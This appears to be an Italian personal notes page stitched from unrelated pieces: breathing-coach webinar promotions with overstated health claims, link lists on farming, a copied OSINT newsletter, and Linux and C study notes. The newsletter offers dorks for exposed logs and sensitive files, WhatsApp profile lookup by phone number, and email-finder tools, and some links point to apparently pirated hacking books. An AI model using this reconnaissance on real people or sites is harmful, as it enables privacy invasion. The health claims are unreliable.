La respirazione corretta mantiene i polmoni in salute. Respirare in modo superficiale, come spesso facciamo nella vita frenetica di tutti i giorni, riduce la capacità polmonare nel tempo. Al contrario, una respirazione profonda e diaframmatica permette ai polmoni di espandersi completamente, migliorando la loro efficienza e prevenendo il declino respiratorio legato all'età.
3. Gestione dello stress e riduzione dell'infiammazione
La respirazione consapevole riduce i livelli di cortisolo, l’ormone dello stress. Mantenere bassi i livelli di cortisolo aiuta a prevenire l'infiammazione cronica, che è spesso associata a malattie degenerative come diabete, ipertensione e artrite. Riducendo l’infiammazione, la respirazione consapevole promuove una maggiore longevità e una migliore qualità della vita.
Lasciami dire, da collega a collega, che tutto questo è impressionante.
Tecniche di Respirazione, come la respirazione diaframmatica e il pranayama, possono aiutare a mantenere una buona funzione polmonare, migliorare la circolazione sanguigna e ridurre lo stress, tutti fattori che contribuiscono a una vita più lunga e sana.
Per questo il respiro è un’arma potentissima nelle mani di noi Professionisti della Salute e Benessere. Non trascuriamo questa evidenza!
Per scoprire di più sul tema, partecipa al mio seminario gratuito "La Scienza del Respiro", lunedì 25 novembre.
Durante il seminario, ti mostrerò come la respirazione può influenzare la longevità e come puoi integrare queste tecniche nella tua pratica professionale per aiutare i tuoi pazienti a vivere più a lungo e in salute.
Sarà la tua occasione per portare un approccio innovativo nella tua professione, anche certificandoti SCIENZIATO DEL RESPIRO Mike Maric Method, la nuova figura di Coach del Respiro e ottenere crediti ECM per il tuo percorso professionale.
.
Scopri come la Respirazione sta già trasformando il campo della Salute e del Benessere
siamo entrati in una nuova era per i professionisti della salute e del benessere, te ne sei accorto?
Le esigenze dei pazienti sono cambiate e, sempre di più, stanno cercando soluzioni innovative per migliorare il proprio approccio al benessere fisico e mentale.
Con l'aumento della domanda di trattamenti olistici e soluzioni innovative, i pazienti oggi cercano molto più che cure tradizionali: vogliono un approccio proattivo che tenga conto del loro benessere complessivo.
Io la soluzione ce l’ho ed è… la Respirazione Consapevole.
Studi scientifici dimostrano che la Respirazione può essere uno strumento straordinario per migliorare la qualità della vita e affrontare problemi di stress e di insonnia.
Ad esempio, uno studio condotto dalla Harvard Medical School ha evidenziato come la respirazione diaframmatica possa ridurre i livelli di cortisolo – l’ormone dello stress – migliorando la qualità del sonno.
Un altra ricerca pubblicata sul Journal of Clinical Sleep Medicine ha dimostrato che praticare tecniche di respirazione profonda prima di andare a letto può ridurre significativamente i sintomi dell'insonnia, migliorando la qualità del riposo fino al 50%.
Ma non si tratta solo di benessere mentale.
La respirazione può avere benefici su problemi di salute comuni come l'ipertensione, il mal di schiena, il dolore cronico o la digestione.
È in grado di influenzare direttamente il funzionamento del nostro sistema cardiovascolare e la longevità.
Il celebre Framingham Heart Study ha dimostrato che una respirazione efficiente è collegata a una maggiore capacità vitale polmonare e a una minore incidenza di malattie cardiovascolari.
Ora immagina di poter integrare queste tecniche nel tuo lavoro quotidiano: dalle cure di alcune patologie, alle terapie specialistiche, ai trattamenti olistici, la Respirazione può diventare una parte fondamentale del tuo approccio.
È uno strumento efficace per affrontare le problematiche più comuni e migliorare significativamente i risultati ottenuti con i tuoi pazienti/assistiti.
Vuoi scoprire come applicare queste tecniche nella tua pratica professionale?
Non mancare al mio seminario gratuito "La Scienza del Respiro", lunedì 25 novembre alle ore 21.
https://www.lascienzadelrespiro.com https://event.webinarjam.com/live/42/zgwlxax5czpiyps2811
Mike Maric
"V1, Vr, V2" (30) – Video didattici per Volo Simulato
Com Ivan Anzellotti
Biohacking e Respirazione: sblocca il potenziale nascosto del corpo e della mente
non servono macchinari complessi né tecnologie futuristiche:
il potere di biohackerare naturalmente il nostro corpo è nel Respiro.
Semplice, accessibile e con un impatto immediato e duraturo sulla nostra salute fisica e mentale.
Facciamo un passo indietro… cosa significa davvero biohacking?
Il biohacking si riferisce all'arte di "hackerare" il nostro corpo e la nostra mente per ottimizzarne le funzioni e migliorare le prestazioni fisiche e mentali.
E la respirazione è uno degli strumenti più potenti che abbiamo per farlo in modo naturale, senza alcun intervento invasivo.
Lascia che te lo dimostri perché è difficile da credere finché non lo si prova…
Ti dico 5 modi in cui agisce il Respiro su corpo e mente:
1. Gestione dello stress in tempo reale
Quando il corpo è sotto stress, i livelli di cortisolo aumentano, creando una reazione a catena di effetti negativi sul nostro sistema immunitario, sul sonno e sulla salute mentale. La respirazione diaframmatica aiuta a controllare immediatamente la risposta del corpo allo stress, riducendo i livelli di cortisolo e promuovendo un senso di calma.
2. Ottimizzazione della funzione cognitiva
La respirazione consapevole può migliorare la nostra capacità di concentrazione e memoria. Quando respiriamo profondamente, aumentiamo l'apporto di ossigeno al cervello, migliorando le funzioni cognitive e le prestazioni mentali. Questo è particolarmente utile per chi deve affrontare situazioni ad alta pressione o svolgere attività che richiedono attenzione e chiarezza mentale.
3. Aumento della resilienza fisica
Respirare in modo efficace aiuta il corpo a ossigenare meglio i tessuti, migliorando così la capacità di recupero e riducendo l'affaticamento. Questo è fondamentale per chi affronta attività fisiche o per i pazienti che hanno bisogno di migliorare il loro benessere generale e il recupero post-intervento o post-infortunio.
4. Regolazione del metabolismo e della digestione
La respirazione consapevole è in grado di attivare il nervo vago, responsabile della regolazione delle funzioni digestive. Una respirazione lenta e profonda aiuta a regolare il metabolismo, migliorare la digestione e ridurre i sintomi legati allo stress, come il reflusso e la sindrome dell’intestino irritabile.
5. Longevità
Il biohacking si concentra anche sulla longevità, e la respirazione è un fattore chiave. Un respiro profondo e regolare ha effetti positivi sul sistema cardiovascolare, riducendo il rischio di malattie cardiache e prolungando la vita in buona salute.
25 novembre alle ore 21. https://www.lascienzadelrespiro.com
Mike
Respirazione: il primo atto fisiologico, il più sottovalutato nella pratica sanitaria
Respirare è l'atto più naturale e spontaneo che ci accompagna dalla nascita.
È automatico, costante e, per la maggior parte delle persone, passa inosservato.
È così naturale che spesso non ci fermiamo mai a pensarci.
Ma tu, come professionista della salute, ti sei mai chiesto: come respirano i tuoi pazienti?
È sorprendente quanto poco ci soffermiamo su questo atto fondamentale.
Spesso, quando chiedo alle persone come respirano, mi guardano perplesse, oppure rispondono dicendo che sanno
che "bisognerebbe respirare con la pancia", ma confessano di non riuscire a farlo correttamente.
Eppure, la respirazione è il primo atto fisiologico necessario alla nostra sopravvivenza, ma è anche uno dei più trascurati nelle pratiche terapeutiche.
Respirare bene significa vivere meglio.
Significa ridurre lo stress, migliorare il recupero fisico, gestire le emozioni e supportare il benessere psicofisico dei tuoi pazienti.
Pensa alle situazioni estreme in cui tutti abbiamo "perso il fiato": una paura improvvisa, uno stato d’ansia,
una grande gioia. La respirazione è sempre lì, al centro delle nostre reazioni emotive e fisiche.
Ma non è solo in quei momenti critici che dobbiamo prestare attenzione al respiro.
Nel nostro mondo iper-veloce, imparare a respirare bene è essenziale per trovare equilibrio, sia fisico che mentale.
La scienza ci sta aprendo nuove porte.
Ricerche recenti della Stanford University, pubblicate su Science, hanno evidenziato un minuscolo gruppo
di neuroni nel tronco encefalico che controlla la respirazione e comunica direttamente con le strutture cerebrali che gestiscono lo stress.
Questa scoperta ha rivoluzionato il modo in cui vediamo la respirazione consapevole, aprendo nuove strade
per lo sviluppo di terapie innovative contro ansia, attacchi di panico e altre condizioni stress-correlate.
Anche se la respirazione è gestita dal sistema nervoso autonomo, sappiamo ora che ha connessioni profonde con le aree cerebrali superiori.
Studi sugli effetti della meditazione e della mindfulness dimostrano che il controllo della respirazione può
indurre cambiamenti strutturali nel cervello, piccoli ma significativi.
Questi dati non sono solo interessanti a livello teorico: sono fondamentali per la tua pratica professionale.
Integrare tecniche di respirazione consapevole nelle tue terapie può trasformare il modo in cui approcci la salute
dei tuoi pazienti, offrendo loro un potente strumento per gestire lo stress, migliorare la qualità del sonno e favorire un recupero più rapido.
Sei disposto a saperne di più? Sei disposto ad aprirti a nuovi orizzonti di cura e trattamento?
A integrare la tua pratica esplorando soluzioni innovative?
Lunedì 25 novembre alle ore 21 al mio seminario gratuito “LA SCIENZA DEL RESPIRO”
La causa principale risiede nelle cattive abitudini posturali, tensioni muscolari e stress accumulato.
Quando la posizione della testa è troppo in avanti, il corpo utilizza la maggior parte dell’energia per evitare le cadute. Ogni 2,5 cm in più di inclinazione della testa in avanti raddoppia il peso della testa sul collo, provocando stanchezza e mal di testa, e riduce il flusso di ossigeno, glucosio e altri nutrienti importanti per il cervello, e non solo.
La postura della testa in avanti, inoltre, può aggiungere più di 13 kg di leva anomala sulla colonna vertebrale cervicale, provocando un disallineamento dell’intera colonna e comportando la perdita del 30% della capacità vitale polmonare.
Il diaframma è agganciato posteriormente alle vertebre lombari, e un’errata postura della colonna vertebrale ne provoca il blocco in inspirazione: ecco allora il fiato corto e frequente per compensare l’errata posizione.
Ecco perché gli esercizi di respirazione aiutano a prevenire e alleviare il mal di schiena.
Espirando in modo lento, continuo e profondo, seduti con la schiena dritta o, ancora meglio, sdraiati in modo da attivare i muscoli addominali, in primis il muscolo trasverso dell’addome, riusciremo a lavorare in maniera profonda andando a decontrarre il tratto
lombare con una retroversione del bacino, aumentando la pressione intraddominale che stira il diaframma portandolo verso l’alto.
Sono numerosi, gli studi che hanno dimostrato come le tecniche di respirazione possono avere un impatto significativo sulla salute della schiena e sulla postura.
Così grazie alla respirazione consapevole, puoi trasformare la tua pratica professionale e aiutare le persone che si affidano a te a vivere senza dolore.
I benefici di integrare la respirazione nelle tue pratiche terapeutiche includono:
La riduzione della tensione nervosa
Una respirazione consapevole e profonda non solo rilassa i muscoli, ma influisce anche sul sistema nervoso, riducendo l'attivazione nervosa che contribuisce al dolore lombare e alla tensione. Il risultato? I tuoi pazienti sperimenteranno una sensazione di rilassamento che si tradurrà in un minor dolore percepito.
Il miglioramento della circolazione sanguigna
Respirare correttamente aumenta l'ossigenazione dei tessuti muscolari, aiutando a ridurre l'infiammazione e favorendo il processo di guarigione. Questo è particolarmente utile per quei pazienti che soffrono di dolori cronici dovuti a scarsa mobilità o cattiva postura.
Una migliore stabilità del core
La respirazione diaframmatica rafforza i muscoli del core, migliorando la stabilità della colonna vertebrale e prevenendo il dolore lombare. Una postura più stabile significa meno sforzo per la schiena e una maggiore resistenza agli infortuni.
Integrare la respirazione consapevole nella tua pratica non solo migliorerà il benessere dei tuoi pazienti, ma aumenterà l'efficacia dei tuoi trattamenti.
“LA SCIENZA DEL RESPIRO”.
Durante l'evento, esploreremo come utilizzare la respirazione per migliorare la salute dei tuoi pazienti e come certificarti come Scienziato del Respiro Mike Maric Method.
Se non l’hai ancora fatto, iscriviti subito: https://www.lascienzadelrespiro.com (i posti stanno finendo!)
Ci vediamo lunedì,
Mike
Ecco come la respirazione consapevole può trasformare il recupero e la qualità del sonno:
1. Attiva il sistema parasimpatico
La respirazione lenta e profonda attiva il sistema nervoso parasimpatico, che è responsabile del rilassamento e del riposo. Aiutare i tuoi pazienti a utilizzare tecniche di respirazione consapevole prima di andare a letto può favorire uno stato di calma profonda, facilitando l'addormentamento e migliorando la qualità del sonno. Studi recenti hanno dimostrato che una pratica regolare di respirazione profonda può ridurre significativamente i livelli di cortisolo, l’ormone dello stress, contribuendo a un sonno più riposante.
2. Riduce dell’insonnia
L'insonnia è spesso legata a uno stato di attivazione del sistema nervoso, che rende difficile rilassarsi e addormentarsi. La respirazione diaframmatica, concentrata sull’allungamento dell’espirazione, invia un segnale di tranquillità al cervello, aiutando a calmare l’iperattività mentale e fisica che spesso ostacola il sonno. Studi pubblicati su Sleep Medicine Reviews hanno dimostrato che tecniche di respirazione profonda prima di coricarsi possono ridurre significativamente i sintomi dell'insonnia.
3. Migliora del recupero fisico
Il sonno è il momento in cui il corpo si rigenera e recupera dalle fatiche quotidiane. Tuttavia, la qualità del sonno è cruciale per massimizzare il recupero. La respirazione consapevole migliora l'ossigenazione del corpo, favorendo una migliore circolazione sanguigna e accelerando i processi di riparazione muscolare. Questo è particolarmente importante per i pazienti che si stanno riprendendo da infortuni o per chi conduce una vita attiva e stressante.
Lascia ora che ti dica x un esercizio di respirazione che puoi consigliare ai tuoi pazienti per migliorare la qualità del sonno:
Invita il paziente a sdraiarsi comodamente sulla schiena in una stanza buia e tranquilla.
Fagli posizionare una mano sull'addome e l’altra sul petto.
Chiedigli di inspirare lentamente e profondamente attraverso il naso, cercando di gonfiare l'addome e mantenendo il petto relativamente fermo.
Poi, invitalo a espirare lentamente attraverso la bocca, rilasciando tutta l’aria e facendo abbassare completamente l’addome.
Suggerisci di ripetere questo processo per 5-10 minuti ogni sera prima di andare a letto.
Vedi x ancora una volta ti dico: imparare a respirare è la soluzione.
Se, quindi, vuoi aiutare chi si affida a te a recuperare meglio e più in fretta diventa uno dei miei PROFESSIONISTI DEL RESPIRO, certificandoti SCIENZIATO DEL RESPIRO, la nuova figura di Coach della respirazione. Potrai anche ottenere crediti ECM.
Durante il mio webinar gratuito “LA SCIENZA DEL RESPIRO” domani, lunedì 25 novembre, alle ore 21 ti dirò come fare. Non mancare.
Se ancora non ti sei iscritto, fallo ora: https://www.lascienzadelrespiro.com
https://event.webinarjam.com/live/42/zgwlxax5czpiyps2811
Ci vediamo domani,
Mike
Macrobiotica, scienza dell"alimentazione, agricoltura sinergica
_________________________________________________________________________
https://climate.copernicus.eu/sites/default/files/custom-uploads/ESOTC%202023/Summary_ESOTC2023.pdf
agricoltura e criteri di rappresentanza
https://www.dirittoegiustizia.it/#/documentDetail/9205917
https://www.ohchr.org/en/specialprocedures/wg-peasants
https://www.google.com/search?q=contadino+non+come+caso+sociale+ma+come+forza+economica&oq=contadino+non+come+caso+sociale+ma+come+forza+economica&gs_lcrp=EgZjaHJvbWUyBggAEEUYOTIHCAEQIRigATIHCAIQIRigAdIBCTEzNzYwajBqNKgCCLACAQ&sourceid=chrome&ie=UTF-8
james c. scott l"infrapolitica dei senza potere
https://www.eleuthera.it/scheda_libro.php?idlib=599
mente locale. per un antropologia dell"abitare
https://www.eleuthera.it/scheda_libro.php?idlib=523
Il Mais, la siccità e l’economia di carta. Le mezze verità che sommate fanno una grossa bugia
https://www.borsaitaliana.it/borsa/glossario/future.html
Small Farms in Italy: What Is Their Impact on the Sustainability of Rural Areas?
by Concetta Cardillo *ORCID andOrlando CiminoORCID
CREA—Research Centre for Agricultural Policies and Bioeconomy, 00187 Rome, Italy
https://doi.org/10.3390/land11122142
https://www.facebook.com/FestivaldelleTerre
https://www.facebook.com/RiabitarelItalia
https://agriregionieuropa.univpm.it/it/content/article/31/45/agricoltura-italiana-e-agricoltura-contadina-lingiusta-competizione-tra
In questi giorni è in corso a Roma il settimo World Forum dell’Ocse sul Wellbeing organizzato con Istat, ministero dell’Economia e Banca d’Italia. Ospiti illustri da tutto il mondo. Si dibatte sulle misure del benessere. Wellbeing in inglese rende bene, più dell’italiano “benessere”, che nel linguaggio comune ha una connotazione più economica.
https://www.repubblica.it/commenti/2024/11/06/news/benessere_che_non_e_pil-423599991/
https://www.la7.it/tagada/video/economia-sabbadini-la-poverta-e-aumentata-30-10-2024-565262
https://agriregionieuropa.univpm.it/it/content/article/31/45/agricoltura-italiana-e-agricoltura-contadina-lingiusta-competizione-tra
In questi giorni è in corso a Roma il settimo World Forum dell’Ocse sul Wellbeing organizzato con Istat, ministero dell’Economia e Banca d’Italia. Ospiti illustri da tutto il mondo. Si dibatte sulle misure del benessere. Wellbeing in inglese rende bene, più dell’italiano “benessere”, che nel linguaggio comune ha una connotazione più economica.
https://www.repubblica.it/commenti/2024/11/06/news/benessere_che_non_e_pil-423599991/
https://www.la7.it/tagada/video/economia-sabbadini-la-poverta-e-aumentata-30-10-2024-565262
https://www.ismeamercati.it/flex/cm/pages/ServeBLOB.php/L/IT/IDPagina/13007
https://ec.europa.eu/eurostat/statistics-explained/SEPDF/cache/73320.pdf
https://viacampesina.org/en/
https://www.reterurale.it/flex/cm/pages/ServeAttachment.php/L/IT/D/D.2f9c4f1a8e57a2c302ef/P/BLOB%AID%D2447/E/PDF#:~:text=LA%20dimensione%20economica%20dell"azienda,ognuna%20delle%20suddette%20attivi%2D%20t%C3%AO
https://www.reterurale.it/flex/cm/pages/ServeBLOB.php/L/IT/IDPagina/14073
https://agricoltura.regione.campania.it/home.htm
pag. 56
bisogna redistribuire la terra
*****
https://www.youtube.com/@macrolibrarsi
Potenzia il tuo sistema immunitario in 6 settimane | Carlotta Gnavi
Macrolibrarsi.it
https://www.facebook.com/IlMercatoContadino/photos/terra-nuova-edizioniin-difesa-dei-contadini-di-antonio-onorati-membro-di-ari-ass/793991929613384/
Il contadino invisibile. E gli Organismi Viventi Modificati…invisibili. di Antonio Onorati
terra nuova fb diretta:
funghi medicinali e cura
https://www.facebook.com/watch/live/?ref=watch_permalink&v=1294621511561660
https://www.nuovaipsa.com/libri/rimedi-naturali/macro-edizioni/stefania-cazzavillan/i-funghi-per-la-salute
https://www.terranuovalibri.it/fascicolo/dettaglio/terra-nuova-novembre-2024-9788866819639-236855.html
.
https://www.avellinotoday.it/blog/sapore-d_irpinia/eima-international-2024-nadia-savino-vince-premio-produzioni-agricole-alternative.html
https://www.facebook.com/aziendabiolu
.
https://www.terranuovalibri.it/ebook/dettaglio/laura-castoldi-martin-halsey/dimagrire-con-la-italian-rice-diet-ebook-9788866813552-236851.html
candida bevilacqua
17 18 novembre Roma prima fiera
no/lox alchol con una masterclass su #kombuca
alberto bianchesi
co-fondatore di scoby
annalisa malerba
esperta in fermentazione e fitoalimurgia
@fermentaction
@we_are_futura
https://www.macrolibrarsi.it/speciali/tutto-sul-microbiota-responsabile-del-70-delle-difese-immunitarie.php
.
11 novembre 20:45
https://macrolibrarsi-it.zoom.us/j/87603262895
femminismo psichiatria cinema criminologia
_________________________________________________________________________
https://www.focus.it/scienza/scienze/come-funziona-luminol-trace-sangue–scena-del-crimine-omicidio-indagini
informatica
____________________________________________________________________________________________________________________________________
#7 (2024) Sensitive data dorks, WhatsApp profile info, Google logs search and Bluesky tips
Avatar
Da Cyb_detective from Cyb_detective’s Substack il 2024-11-14 19:05
Dettagli Intestazioni Testo semplice
Forwarded this email? Subscribe here for more
#7 (2024) Sensitive data dorks, WhatsApp profile info, Google logs search and Bluesky tips
Cyb_detective
Nov 14
READ IN APP
Hello, my dear readers!
Thank you so much for staying with me!
Today I'm going to tell you about the most interesting posts on my Twitter feed made after August 5, 2024.
Sensitive data dorks
New section in my "Dorks collections list" Github repo https://github.com/cipher387/Dorks-collections-list: Sensitive data dorks.
It contains links to articles with sample queries to find erroneously discovered documents with important information on company websites.
Google .log files search
When gathering information about a website, don't forget that Google indexes logs. With ‘filetype:log site:yourtarget’ or ‘filetype:log intext:targetrelatedkeyword’ you can find useful technical information for investigation. Tip by x.com/AlHomaidNoor
Get Whatsapp Profile Information by phone number
ID, description, email, website, location etc (works not only for business but also for personal accounts, WhatsApp Login no required)
http://whatsapp.checkleaked.cc
OSINT ROCKS – 7 free online OSINT Tools
GHUNT – Google account info
Sherlock – nickname enumeration
Holehe – search accounts by email
Ignorant – search accounts by phone
Whois domain lookup
WhatsApp profile info
HudsonRock – email leaks lookup
http://osint.rocks
Tools for searching emails for a specific domain:
https://snov.io/email-finder
https://experte.com/email-finder
https://github.com/Josue87/EmailFinder
https://github.com/GiJ03/Infoga
https://infoga.io
https://findemail.io
https://hunter.io/domain-search
https://anymailfinder.com/email-finder-by-domain
https://minelead.io
Research papers search engines
https://science.gov
https://search.worldcat.org
https://researchgate.net
https://core.ac.uk
https://link.springer.com
https://base-search.net
https://refseek.com
https://jstor.org
Wayback Machine collection search
@BanPangar shared a method for finding emails/nicknames mentions in the text of web pages/docs with archive.org collection search. Help find a lot of things that don't show up in Google results. Don't forget the quotes.
Wayback Machine Telegram Collection Search
– 597,269,554 Telegram (t me) pages
– ability to find deleted content
– ability to see all search results (not just a small portion, as in Google)
– advanced search filters
Bluesky Tips
After the US election, Americans are abandoning Twitter en masse in favor of other platforms. In the last week, the number of BlueSky users has increased by several million. In addition, many people who abandoned their BlueSky accounts in the summer and fall of 2023 are starting them up again.
I've been doing daily posts there for over a year now. And on my profile, you can find tips for BlueSky users that I don't post on Twitter and other platforms.
Thank you very much for your attention!
:
https://stackoverflow.com/questions/66509264/what-is-c-us-means-in-whatsapp-web-js
I n f o r m a t i c a
_____________________________________________________________________________________________________________________
art of hacking
——————————————————————————————————–
39. Esercizio: somma max
https://www.udemy.com/course/linguaggio-c-il-corso-premium-con-esercizi-svolti/learn/lecture/28802096#overview
In questo caso il contatore incominciamo da 0
https://www.google.com/search?q=linguaggio+C+i+cicli+while+moneta+somma+in+questo+caso+il+loop+non+%C3%A8+infinito+perch%C3%A8+il+contatore+incomincia+a+inre
respiro
ascolto consapevole dei rumori
https://www.facebook.com/reel/730923912326876meentare&oq=
linguaggio+C+i+cicli+while+moneta+somma+in+questo+caso+il+loop+non+%C3%A8+infinito+perch%C3%A8+il+contatore
+incomincia+a+inremeentare&aqs=chrome..69i57.45492j0j4&sourceid=chrome&ie=UTF-8
http://www.diit.unict.it/users/scava/dispense/FdI_270/LucidiIstruzioniIterative.pdf
https://www.freecodecamp.org/italian/news/loop-for-in-c-con-esempi-di-codice/
40. Esercizio alternativo:somma max
iterazione ciclo while somma C
41. Esercizio: calcolatrice
esercizio calcolatrice
printf 1 addizione 2 sottrazione 3 moltipicazione 4 divisione
scanf ("d", &operazione);
default non è stata indicata un operazione idonea
https://www.iprogrammatori.it/forum-programmazione/cplusplus/devo-creare-una-calcolatrice-problema-t42815.html
—-
———————————————
art of hacking
————————————
https://it.zlibrary-global.se/book/17685218/32f742?dsource=recommend
https://maria2021.noblogs.org/files/2022/09/Linux.-Un-mondo-tutto-da-scoprire.-Italia-Giuseppe-Sanna.pdf
https://it.zlibrary-global.se/author/Simone%20Piccardi
https://person.dibris.unige.it/delzanno-giorgio/SO1/AA0607/corso.pdf
https://www.oreilly.com/library/view/computer-security-art/9780134097145/
https://ptgmedia.pearsoncmg.com/images/9780321712332/samplepages/9780321712332_Sample.pdf
https://maria2021.noblogs.org/files/2023/06/Computer-Security-Art-and-Science-Second-Matt-Bishop.pdf
*****
*****
*****
linux e linguaggio C
https://brandolese.faculty.polimi.it/acsocr/B02%20-%20Linux%20Processes.pdf
https://bookshop.editrice-esculapio.com/products/pelagatti-sistema-operativo-linux
https://www4.ceda.polimi.it/manifesti/manifesti/controller/ricerche/RicercaPerDocentiPublic.do?evn_prodotti=EVENTO&k_doc=230773&aa=2014&lang=IT
https://www.deib.polimi.it/ita/notizie-ed-eventi
https://maria2021.noblogs.org/files/2023/06/cover-59.jpg
https://maria2021.noblogs.org/files/2023/06/Sistema-Operativo-Linux-Pelagatti-Giusepp-Sconosciuto.txt
https://maria2021.noblogs.org/files/2023/06/SistemaOperativoLinux-Pelagatti-Giuseppe-.pdf
***** ***** ***** *****
*
*
*
*
* * * * *
a r t e d e l l " h a c k i n g
_______________________________________________________________________________________________________
Tecniche di Programmazione – Prof. Iocchi – Lezione 27 (9 maggio 2018)
Video DIAG – Sapienza, Università di Roma
https://www.youtube.com/watch?v=U_1r9P4M3Hg
17:09
Tecniche di Programmazione – Prof. Iocchi – Lezione 27 (9 maggio 2018)
https://www.youtube.com/watch?v=U_1r9P4M3Hg
4:00
https://www.aranzulla.it/come-programmare-in-c-1058925.html
Video DIAG – Sapienza, Università di Roma
https://www.youtube.com/channel/UCbaID7wz_ATPrddPkYlVK1w
*****
Tecniche di Programmazione – Prof. Iocchi – Indice
https://www.youtube.com/watch?v=FyQAqS7p1nM
http://www.dis.uniroma1.it/
Corso di Laurea in Ingegneria Informatica
Tecniche di Programmazione
https://sites.google.com/a/dis.uniroma1.it/tp2018/
e-learning "Sapienza" con Moodle
https://elearning.uniroma1.it/login/index.php
—-
effective c
https://nostarch.com/Effective_C
https://github.com/rcseacord
http://bookszlibb74ugqojhzhg2a63w5i2atv5bqarulgczawnbmsb6s6qead.onion/book/5677755/309777?dsource=recommend
https://maria2021.noblogs.org/files/2023/03/cover-53-227×300.jpg
https://maria2021.noblogs.org/files/2023/03/Effective-C-An-Introduction-to-Professiona-Sconosciuto.pdf
—–
chsh -s /bin/bash
https://forum.manjaro.org/t/apparently-unable-to-change-shell-to-bash/78946/2
https://man.archlinux.org/man/bash.1.it
http://www.science.unitn.it/~fiorella/AppuntiLinux/al-25.html
https://wiki.archlinux.org/title/Frequently_asked_questions_(Italiano)
https://wiki.archlinux.org/title/Bash
x
ma come si toglie sta versione fumettistica della consolle?
z
per l'aspetto puoi modificare le preferenze del profilo da -file- per il resto devi modificare il file di configurazione del terminale che è una cartella nascosta in /home/user
un file nascosto
y
Definire la Shell zsh invece di bash fumettistica è molto riduttiva se paragonata alle potenzialità della Shell zsh che offre rispetto a bash .. 🙈
x
questione di abitudine…
y
Ad ogni modo se ti riferisci a riavere una Shell tipo ubuntu etc ( che non mi sembra uso zsh )
dovresti usare
chsh -s /bin/bash
logout login e riavrai bash
Se intendi questo altrimenti se devi modificare il tema di zsh dal file .zshrc
Bash – ArchWiki
https://wiki.archlinux.org/title/Bash
Zsh – ArchWiki
https://wiki.archlinux.org/title/Zsh
Bash e zsh son due Shell .. uno usa quello che più gli piace ..
How to Switch to bash from zsh in Linux? – Its Linux FOSS
https://itslinuxfoss.com/switch-bash-zsh-linux/
x
15:09:03 zsh
15:09:07 tutta la vita.
15:09:14 con omzsh.
y
quindi quando salverò con hello world.sh essendo C un linguaggio compilato dovrebbe andare?
15:11:43
x ho sempre saputo che per far funzionare un programma in C devi prima compilarlo e poi eseguirlo.
15:12:04 non è interpretato.
15:12:33 gcc script.c -o script
15:12:40 chmod -x script
15:12:46 ./script
15:13:16 diversamente se fosse interpretato.come python
15:13:21 semplicemente
15:13:32 python3 script.py
*chmod +x script
15:14:31
il C e derivati non li ho ancora affrontati.
15:15:30 sono un amante del bash scripting.
15:15:52 so qualcosa di python
15:16:00 e mi interesso di go
15:16:26 linguaggi come C somo molto piu complessi
15:16:37 rispetto al.mio attuale livello.
y
/home/lele exec bash 1 ✘ root@lele-hpelitedragonflyg2notebookpc
15:20:06 [lele-hpelitedragonflyg2notebookpc lele]#
15:21:01 cioè se scrivo questo già uno va in bash?
15:21:43 avevo solo scrito sudo e la password
15:21:49 ero in zsh
15:21:53
x
fai
15:22:02 cat /etc/passwd
15:22:10 vedrai che l'utente root
15:22:15 ha come shell
15:22:20 /bin/bash
15:22:28 per avere zsh anche su root
15:22:37 devi fare sudo chsh
15:23:07 provabilmente hai cambiato la shell del solo user.
15:24:32
y
~ sudo chsh ✔
15:24:32 [sudo] password di lele:
15:24:32 Modifica shell per root in corso.
15:24:32 Nuova shell [/bin/bash]:
15:25:01
x
e scrivi /bin/zsh
15:26:16 comunque sia
15:26:21
y
Nuova shell [/bin/bash]: /bin/zsh
15:26:21 Shell modificata.
15:26:24
x
exec /bin/bash
15:26:30 richiama bash.
15:26:55 quindi è normale che ti apra una sessione bash
exec /data/data/com.termux/files/usr/bin/bash
15:29:08 ~ $
15:29:31 questo l'ho appena fatto da terminale ^
15:29:46 è come ti dicevo
15:30:09 quando hai dubbi
15:30:17 su quale shell stai utilizzando
15:30:23 fai echo $SHELL
15:30:51 e ti dice la shell che hai impostata come predefinita per il tuo utente.
y
~ echo $SHELL ✔
15:31:45 /bin/zsh
x
Hook ecco
15:32:04 come predefinita hai zsh
15:32:16 quindi hai fatto chsh con successo.
_________________________________________________________
i links dei libri art of hacking di erickson:
*
*
*
*
* * * * *
a r t o f h a c k i n g
____________________________________________________
Inoltre il codice sorgente riportato nel libro è scaricabile gratuitamente
all’indirizzo
http://www.nostarch.com/download/booksrc.zip
https://www.wiley.com/en-us/Hands+on+Hacking%3A+Become+an+Expert+at+Next+Gen+Penetration+Testing+and+Purple+Teaming-p-9781119561453
https://maria2021.noblogs.org/files/2023/03/cover-24-211×300.jpg
info@hacker.house
https://hacker.house/training
https://www.hackerhousebook.com
pag.40
https://www.hackerhousebook.com/.docs/how-board-of-directors-feel-about-cyber-security-reports-1.pdf
https://maria2021.noblogs.org/files/2023/03/hands-on-hacking-Sconosciuto.pdf
*********************************************************************************************
2008
https://maria2021.noblogs.org/files/2022/05/Hacking_-The-Art-of-Exploitation-2nd-Edit-Jon-Erickson.pdf
https://maria2021.noblogs.org/files/2022/06/lartedellhacking1-JonErickson.pdf
https://maria2021.noblogs.org/files/2022/06/lartedellhacking2-JonErickson-.pdf
2011
https://nostarch.com/hacking2.htm
https://maria2021.noblogs.org/files/2022/11/cover-19-227×300.jpg
https://maria2021.noblogs.org/files/2022/11/Hacking-The-Art-of-Exploitation-2nd-Editi-Jon-Erickson.pdf
https://maria2021.noblogs.org/files/2022/09/Ilrumoredellhacking-.pdf
https://maria2021.noblogs.org/files/2022/06/imparare-l-hacking-riccardoMeggiato.pdf
https://maria2021.noblogs.org/files/2022/09/vsip.info-hacking-con-python-7-pdf-free-Sconosciuto.pdf
https://www.udemy.com/course/linguaggio-c-il-corso-premium-con-esercizi-svolti/learn/lecture/28849918?start=0#overview
Programmazione in C? No problem 😉
https://www.facebook.com/groups/1492020314411417
:
https://lib-tljpnvxi5ytpnk7fynw3vfq6.1lib.cz/book/25357416/664592
_______________________________
…………………………………………
esercizio
https://maria2021.noblogs.org/files/2022/06/lartedellhacking1-JonErickson.pdf
pag. 40 di 332
[lele@lele-hpelitedragonflyg2notebookpc ~]$ gcc /home/lele/Scaricati/booksrc/firstprog.c
[lele@lele-hpelitedragonflyg2notebookpc ~]$ ls -l a.out
-rwxr-xr-x 1 lele lele 15424 8 mar 17.38 a.out
[lele@lele-hpelitedragonflyg2notebookpc ~]$ ./a.out
Hello World!
Hello World!
Hello World!
Hello World!
Hello World!
Hello World!
Hello World!
Hello World!
Hello World!
Hello World!
_____________________
https://software.manjaro.org/package/gdb
[lele@lele-hpelitedragonflyg2notebookpc ~]$ gcc -g /home/lele/Scaricati/booksrc/firstprog.c
